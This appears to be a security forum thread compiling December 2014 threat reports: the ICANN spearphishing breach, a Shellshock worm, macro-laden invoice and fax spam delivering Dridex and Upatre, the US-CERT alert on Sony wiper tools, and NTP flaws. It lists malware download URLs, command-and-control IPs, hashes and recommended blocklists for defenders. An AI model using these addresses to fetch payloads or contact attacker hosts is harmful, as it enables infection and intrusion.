Dec 17 2014 - "Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group. ICANN, which oversees the Internet's address system, said in a release published Tuesday* that the breach also gave attackers administrative access to all files stored in its centralized zone data system**, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system. Domain registries use the database to help manage the current allocation of hundreds of new generic top level domains (gTLDs) currently underway. Attackers also gained unauthorized access to the content management systems of several ICANN blogs... As the group controlling the Internet's domain name system, ICANN is a prime target for all kinds of attacks from hackers eager to obtain data that can be used to breach other targets..."
* https://www.icann.org/news/announcement-2-2014-12-16-en

* https://czds.icann.org/en
___

Worm exploits nasty Shellshock bug to commandeer network storage systems
- http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/
Dec 15 2014 - "Criminal hackers are actively exploiting the critical shellshock vulnerability* to install a self-replicating backdoor on a popular line of storage systems, researchers have warned. The malicious worm targets network-attached storage systems made by Taiwan-based QNAP, according to a blog post published Sunday** by the Sans Institute. The underlying shellshock attack code exploits a bug in GNU Bash that gives attackers the ability to run commands and code of their choice on vulnerable systems. QNAP engineers released an update in October that patches systems against the vulnerability, but the discovery of the worm in the wild suggests a statistically significant portion of users have yet to apply it. Infected systems are equipped with a secure shell (SSH) server and a new administrative user, giving the attackers a persistent backdoor to sneak back into the device at any time in the future..."
* http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

** https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061

:fear::fear: :mad:

FYI...

Fake 'BACS payment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/bacs-payment-ref9408yc-excel-xls-malware/
19 Dec 2014 - "'BACS payment Ref:9408YC' coming from random email addresses with a malicious Excel XLS attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please see below our payment confirmation for funds into your account on Tuesday re invoice 9408YC
Accounts Assistant
Tel: 01874 430 632
Fax: 01874 254 622

19 December 2014: 9408YC.xls - Current Virus total detections: 0/53* 0/55** 0/53***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbdc93de4eded4d2df825a30f0e255136c3564738e3298f367a4557b5b360eba/analysis/1418987287/

** https://www.virustotal.com/en/file/2894ad6bef05b0bba2c6f56194f7402c5535b03c7bedda7df7065269cd52cb39/analysis/1418987903/

*** https://www.virustotal.com/en/file/f26d6bc06ae906df591432cc5a5038589358f1681a64c896c468a72beccb70c5/analysis/1418987497/

- http://blog.dynamoo.com/2014/12/malware-spam-bacs-payment-ref901109rw.html
19 Dec 2014
> https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
"... UPDATE: A further version of this is doing the rounds with an attachment which also has zero detections at VirusTotal*..."
* https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
___

Fake ACH SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-blocked-transaction-case.html
19 Dec 2014 - "This -fake- ACH spam leads to malware:
Date: 19 December 2014 at 16:06
Subject: Blocked Transaction. Case No 970332
The Automated Clearing House transaction (ID: 732021371), recently initiated from your online banking account, was rejected by the other financial institution.
Canceled ACH transaction
ACH file Case ID 083520
Transaction Amount 1458.42 USD
Sender e-mail info@victimdomain
Reason of Termination See attached statement
Please open the word file enclosed with this email to get more info about this issue.

In the sample I have seen, the attachment is ACH transfer 1336.doc which despite the name is actually a .DOCX file, which has a VirusTotal dectection rate of 4/54*. Inside are a series of images detailing how to turn off macro security.. which is a very -bad- idea.
1] https://1.bp.blogspot.com/-zPH8zcx7OrY/VJR1Q7QBOEI/AAAAAAAAGAM/xX6zhss2M4Q/s1600/image3.png

2] https://2.bp.blogspot.com/-84ljBD1vRQg/VJR1Ru59Q2I/AAAAAAAAGAU/WcH0b9IEjII/s1600/image4.png

3] https://1.bp.blogspot.com/-vCCQWdg2iQ0/VJR1R9zpj1I/AAAAAAAAGAY/ASyT9ZXBVz8/s1600/image5.png

4] https://4.bp.blogspot.com/-cCjgc3glQpg/VJR1SDKNwjI/AAAAAAAAGAc/c_b1Rf1nawQ/s1600/image6.png

If you enable macros, then this macro... will run which will download a malicious binary from http ://nikolesy .com/tmp/ten.exe, this has a VirusTotal detection rate of 8/51** as is identified as the Dridex banking trojan."
* https://www.virustotal.com/en/file/332621eaa52f0289be55f01c6fa61dc93f541cfb52f718148958b72209e084ac/analysis/1419014981/

** https://www.virustotal.com/en/file/22015b1e727d0846fd051a1ee6bb8a243f2c8eb150d67bb8e0c82574eed694e4/analysis/1419015141/
___

Fake 'my-fax' SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-no-replaymy-faxcom.html
19 Dec 2014 - "This -fake- fax spam leads to malware:
From: Fax [no-replay@ my-fax .com]
Date: 19 December 2014 at 15:37
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: http ://crematori .org/myfax/company.html
Documents are encrypted in transit and store in a secure repository...

... Clicking the link downloads a file fax8127480_924_pdf.zip which in turn contains a malicious executable fax8127480_924.exe which has a VirusTotal detection rate of 3/55*. Most automated analysis tools are inconclusive... but the VT report shows network connections to the following locations:
http ://202.153.35.133:40542/1912uk22//0/51-SP3/0/
http ://202.153.35.133:40542/1912uk22//1/0/0/
http ://natural-anxiety-remedies .com/wp-includes/images/wlw/pack22.pne
Recommended blocklist:
202.153.35.133
natural-anxiety-remedies .com "
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/1419003908/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Fake 'Target Order Confirmation' - malware SPAM
- http://www.hoax-slayer.com/target-order-information-malware.shtml
Dec 19, 2014 - "Order confirmation email purporting to be from Target claims that the company's online store has an order addressed to you... The email is -not- from Target. The link in the message opens a compromised website that contains malware. The Target version is just one in a series of similar malware messages that have falsely claimed to be from well-known stores, including Walmart, Costco and Wallgreens...
> http://www.hoax-slayer.com/images/target-order-information-malware-1.jpg
If you use a non-Windows operating system, you may see a message claiming that the download is not compatible with your computer. If you are using one of the targeted operating systems, the malicious file may start downloading automatically. Alternatively, a message on the website may instruct you to click a link to download the file. Typically, the download will be a .zip file that hides a .exe file inside. Opening the .exe file will install the malware. The malware payload used in these campaigns can vary. But, typically, the malware can steal personal information from your computer and relay it to online scammers. The malware in this version is designed to add your computer to the infamous Asprox Botnet... This email is just one in a continuing series of malware messages that claim to be from various high profile stores, including Costco, Walmart and Wallgreens. Other versions list order or transaction details, but do not name any particular store. Again, links in the messages lead to malware websites. In some cases, the malware is contained in an attached file. If you receive one of these -bogus- emails, do -not- click any links or open any attachments..."
___

Walgreens Order Spam
- http://threattrack.tumblr.com/post/105606986528/walgreens-order-spam
Dec 19, 2014 - "Subjects Seen:
Order Status
Typical e-mail details:
E-shop Walgreens has received an order addressed to you which has to be confirmed by the recipient within 4 days. Upon confirmation you may pick it in any nearest store of Walgreens.
Detailed order information is provided here.
Walgreens

Malicious URLs:
rugby-game .com/search.php?w=ZT5EpruzameN92MeSlvI09DbnfrIhx1yqu3wrootEpM=
Malicious File Name and MD5:
Walgreens_OrderID-543759.exe (39CEBF3F19AF4C4F17CA5D8EFB940CB6)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/834af3262758a5dc4d3189db0af8a91d/tumblr_inline_ngu2ovU7f51r6pupn.png

Tagged: Walgreens, Kuluoz
___

Ars was briefly hacked yesterday; here’s what we know
If you have an account on Ars Technica, please change your password today..
- http://arstechnica.com/staff/2014/12/ars-was-briefly-hacked-yesterday-heres-what-we-know/
Dec 16 2014 - "At 20:00 CT on December 14, an Internet intruder gained access to one of the Ars Web servers and spent the next hour attempting to get from the Web server to a more central machine. At 20:52, the attempt was successful thanks to information gleaned from a poorly located backup file. The next day, at 14:13, the hacker returned to the central server and replaced the main Ars webpage with a defacement page that streamed a song from the band Dual Core... "All the Things"... by 14:29, our technical team had removed the defaced page and restored normal Ars operations. We spent the afternoon changing all internal passwords and certificates and hardening server security even further. Log files show the hacker's movements through our servers and suggest that he or she had the opportunity to copy the user database. This database contains no payment information on Ars subscribers, but it does contain user e-mail addresses and passwords. Those passwords, however, are stored in hashed form (using 2,048 iterations of the MD5 algorithm and salted with a random series of characters). Out of an excess of caution, we strongly encourage all Ars readers - especially any who have reused their Ars passwords on other, more sensitive sites - to change their passwords today. We are continuing with a full autopsy of the hack and will provide updates if anything new comes to light..."

:fear::fear: :mad:

FYI...

Targeted Destructive Malware - Alert (TA14-353A)
- https://www.us-cert.gov/ncas/alerts/TA14-353A
Last revised: Dec 20, 2014 - "Systems Affected: Microsoft Windows
Overview: US-CERT was recently notified by a trusted third party of cyber threat actors using a Server Message Block (SMB) Worm Tool to conduct cyber exploitation activities recently targeting a major entertainment company. This SMB Worm Tool is equipped with a Listening Implant, Lightweight Backdoor, Proxy Tool, Destructive Hard Drive Tool, and Destructive Target Cleaning Tool.
SMB Worm Tool: This worm uses a brute force authentication attack to propagate via Windows SMB shares. It connects home every five minutes to send log data back to command and control (C2) infrastructure if it has successfully spread to other Windows hosts via SMB port 445. The tool also accepts new scan tasking when it connects to C2*. There are two main threads: the first thread calls home and sends back logs (a list of successful SMB exploitations), and the second thread attempts to guess passwords for SMB connections. If the password is correctly guessed, a file share is established and file is copied and run on the newly-infected host...
Destructive Hard Drive Tool: This tool is a tailored hard-drive wiping tool that is intended to destroy data past the point of recovery and to complicate the victim machine’s recovery. If the CNE operator has administrator-level privileges on the host, the program will over-write portions of up-to the first four physical drives attached, and over-write the master boot record (MBR) with a program designed to cause further damage if the hard drive is re-booted. This further results in the victim machine being non-operational with irrecoverable data (There is a caveat for machines installed with the windows 7 operating system: windows 7 machines will continue to operate in a degraded state with the targeted files destroyed until after reboot, in which the infected MBR then wipes the drive.) If the actor has user-level access, the result includes specific files being deleted and practically irrecoverable, but the victim machine would remain usable.
Destructive Target Cleaning Tool: This tool renders victim machines inoperable by overwriting the Master Boot Record. The tool is dropped and installed by another executable and consists of three parts: an executable and a dll which contain the destructive components, and an encoded command file that contains the actual destruction commands to be executed.
... *summary of the C2 IP addresses:
203.131.222.102 Thailand...
217.96.33.164 Poland...
88.53.215.64 Italy...
200.87.126.116 Bolivia...
58.185.154.99 Singapore...
212.31.102.100 Cypress...
208.105.226.235 United States..."
(More detail at the us-cert URL above.)

203.131.222.102: https://www.virustotal.com/en/ip-address/203.131.222.102/information/
217.96.33.164: https://www.virustotal.com/en/ip-address/217.96.33.164/information/
88.53.215.64: https://www.virustotal.com/en/ip-address/88.53.215.64/information/
200.87.126.116: https://www.virustotal.com/en/ip-address/200.87.126.116/information/
58.185.154.99: https://www.virustotal.com/en/ip-address/58.185.154.99/information/
212.31.102.100: https://www.virustotal.com/en/ip-address/212.31.102.100/information/
208.105.226.235: https://www.virustotal.com/en/ip-address/208.105.226.235/information/

- http://arstechnica.com/security/2014/12/malware-believed-to-hit-sony-studio-contained-a-cocktail-of-badness/
Dec 19 2014
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/c2-ip-addresses.png
___

Fake FedEx SPAM – malware
- http://myonlinesecurity.co.uk/fedex-postal-notification-service-malware/
20 Dec 2014 - "'Postal Notification Service' pretending to come from FedEx with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Fedex-Postal-Notification-Service.jpg

20 December 2014 : notification.zip: Extracts to: notification_48957348759483759834759834758934798537498.exe
Current Virus total detections: 1/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/777771b8483ce8a8503ed4cdd86d425c3088c17fa7794512913751d48421a860/analysis/1419076775/

"Package Delivery" Themed Scam Alert
- https://www.us-cert.gov/ncas/current-activity/2014/12/19/FTC-Releases-Package-Delivery-Themed-Scam-Alert
Dec 19, 2014
> http://www.consumer.ftc.gov/blog/package-delivery-scam-delivered-your-inbox

:fear: :mad:

FYI...

Angler EK on 193.109.69.59
- http://blog.dynamoo.com/2014/12/angler-ek-on-1931096959.html
22 Dec 2014 - "193.109.69.59 (Mir Telematiki Ltd, Russia) is hosting what appears to be the Angler Exploit Kit... infection chain... The last step is where the badness happens, hosted on 193.109.69.59 (Mir Telematiki Ltd, Russia) which is also being used to host the following malicious domains:
qwe.holidayspeedsix .biz
qwe.holidayspeedfive .biz
qwe.holidayspeedseven .biz
A quick look at the contents of 193.109.68.0/23 shows some other questionable sites. A look at the sites hosted* in this /23 indicates that most of them appear to be selling counterfeit goods, so -blocking- the entire /23 will probably be no great loss.
Recommended -minimum- blocklist:
193.109.69.59
holidayspeedsix .biz
holidayspeedfive .biz
holidayspeedseven .biz "
* http://www.dynamoo.com/files/mmuskatov.csv

193.109.69.59: https://www.virustotal.com/en/ip-address/193.109.69.59/information/
___

Fake 'Tiket alert' SPAM
- http://blog.dynamoo.com/2014/12/tiket-alert-spam-tiket-really.html
22 Dec 2014 - "Sometimes the spammers don't really try very hard. Like they have to make a quota or something. A "Tiket alert" from the FBI.. or is it FBR? Really?

From: FBR service [jon.wo@ fbi .com]
Date: 22 December 2014 at 18:29
Subject: Tiket alert
Look at the link file for more information.
http <redacted>
Assistant Vice President, FBR service
Management Corporation

I have seen another version of this where the download location is negociomega .com/ticket/fsb.html. Clicking on the link downloads a file ticket8724_pdf.zip which in turn contains a malicious executable ticket8724_pdf.exe. This has a VirusTotal detection rate of 2/54*. Between that VirusTotal analysis and the Anubis analysis we can see that the malware attempts to phone home to:
http ://202.153.35.133 :42463/2212us12//0/51-SP3/0/
http ://202.153.35.133 :42463/2212us12//1/0/0/
http ://moorfuse .com/images/unk12.pne
202.153.35.133 is Excell Media Pvt Ltd, India.
Recommended blocklist:
202.153.35.133
moorfuse .com
mitsuba-kenya .com
negociomega .com "
* https://www.virustotal.com/en/file/131855bdd2832705bf8c90f30efd43a22956ca86bab19f3a9941158fd33291af/analysis/1419277515/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
188.132.231.115: https://www.virustotal.com/en/ip-address/188.132.231.115/information/
___

Fake 'Employee Documents' Fax SPAM
- http://blog.mxlab.eu/2014/12/19/email-employee-documents-internal-use-from-no-replaymy-fax-com-leads-to-malicious-zip-file/
Dec 19, 2014 - "... intercepted quite a large distribution campaign by email with the subject “Employee Documents – Internal Use”, this email is sent from the spoofed address “Fax <no-replay@ my-fax .com>” and has the following body:
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: ... <redacted>
Documents are encrypted in transit and store in a secure repository ...

The downloaded file fax8127480_924_pdf.zip contains the 26 kB large file fax8127480_924.exe. The trojan is known as W32/Trojan.HZAT-8029, W32/Trojan3.MYF, Downloader-FSH!FFA9EE754457, Upatre.FH or a variant of Win32/Kryptik.CTMJ... Virus Total*..."
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/
File name: fax8127480_924.exe
Detection ratio: 26/53
Analysis date: 2014-12-22
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.127.104.112: https://www.virustotal.com/en/ip-address/174.127.104.112/information/
83.166.234.251: https://www.virustotal.com/en/ip-address/83.166.234.251/information/
23.10.252.26: https://www.virustotal.com/en/ip-address/23.10.252.26/information/
50.7.247.42: https://www.virustotal.com/en/ip-address/50.7.247.42/information/
217.172.180.178: https://www.virustotal.com/en/ip-address/217.172.180.178/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/

:fear::fear: :mad:

FYI...

Fake 'Remittance Advice' SPAM - malicious Excel attachment
- http://blog.dynamoo.com/2014/12/remittance-advice-spam-comes-with.html
23 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Whitney
Date: 23 December 2014 at 09:12
Subject: Remittance Advice -DPRC93
Confidentiality and Disclaimer: This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error...

The reference in the subject varies, and the name of the attachment always matches (so in this case DPRC93.xls). There are in fact three different versions of the document, all of which have a malicious macro. At the moment, none of these are detected by anti-virus vendors [1] [2] [3]... the macro has now changed completely, as it now loads some of the data from the Excel spreadsheet itself and puts it into a file %TEMP%\windows.vbs. So far I have seen three different scripts... which download a component from one of the following locations:
http ://185.48.56.133:8080/sstat/lldvs.php
http ://95.163.121.27:8080/sstat/lldvs.php
http ://92.63.88.100:8080/sstat/lldvs.php
It appears that this email is downloaded as test.exe and is then saved as %TEMP%\servics.exe. The ThreatExpert report shows traffic to the following:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer AG, Germany)
VirusTotal indicates a detection rate of just 3/54*, and identifies it as Dridex.
Recommended blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
185.48.56.133
95.163.121.27
92.63.88.100
92.63.88.106
Note that there are two IPs acting as downloaders in the 92.63.88.0/24 range (MWTV, Latvia). It may be that you would also want to block that range as well."
1] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/

2] https://www.virustotal.com/en/file/87bb64f9e759f93b0b47c1c8af917c5a11d66221fe146bbbc26373560c96a0fe/analysis/1419330170/

3] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/

* https://www.virustotal.com/en/file/a9239d875ecd1dbf4d83e1112c07c49b99b2594262b6a57e0eaa0518390d5ffb/analysis/1419333104/

- http://myonlinesecurity.co.uk/remittance-advice-pzdf16-excel-xls-malware/
23 Dec 2014
> 22 Dec 2014 : PZDF16.xls Current Virus total detections: 0/55*:
TKBJ98.xls Current Virus total detections: 0/55**
* https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419328785/

** https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/1419329398/

- http://blog.mxlab.eu/2014/12/23/email-remittance-advice-lcdq26-contains-excel-file-with-malicious-macro/
Dec 23 2014
> https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/
___

Fake 'CHRISTMAS OFFERS.docx' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/jayne-route2fitness-co-uk-christmas-offers-docx-word-doc-malware/
23 Dec 2014 - "'CHRISTMAS OFFERS.docx' pretending to come from Jayne <Jayne@ route2fitness .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email body is completely -blank- . As per usual there are at least 2 different file sizes of this malware although all are named exactly the same.

22 Dec 2014: CHRISTMAS OFFERS.doc (41 kb) . Current Virus total detections: 0/55* : CHRISTMAS OFFERS.doc (44 kb) . Current Virus total detections: 0/56**
Downloads dridex Trojan from microinvent .com//js/bin.exe which is moved to and run from %temp%1\V2MUY2XWYSFXQ.exe Virus total*** ..."
* https://www.virustotal.com/en/file/0c45d7f517f1086528576c5b696303b792c29244dc0a4421f3720ed84a521b2e/analysis/1419327481/

** https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/1419327349/

*** https://www.virustotal.com/en/file/de25222783cdcbe20ca8d8d9a531f150387260e5297f672474141227eeff7773/analysis/1419334606/

- http://blog.mxlab.eu/2014/12/23/empty-email-with-attached-word-file-christmas-offers-docx-contains-malicious-macro/
Dec 23, 2014
> https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/
___

Network Time Protocol Vulnerabilities
- https://ics-cert.us-cert.gov//advisories/ICSA-14-353-01
Dec 22, 2014 - "... vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available. Products using NTP service prior to NTP-4.2.8 are affected. No specific vendor is specified because this is an open source protocol.
IMPACT: Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process..."

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295 - 7.5 (HIGH)

- http://arstechnica.com/security/2014/12/attack-code-exploiting-critical-bugs-in-net-time-sync-puts-servers-at-risk/
Dec 19 2014

:fear::fear: :mad: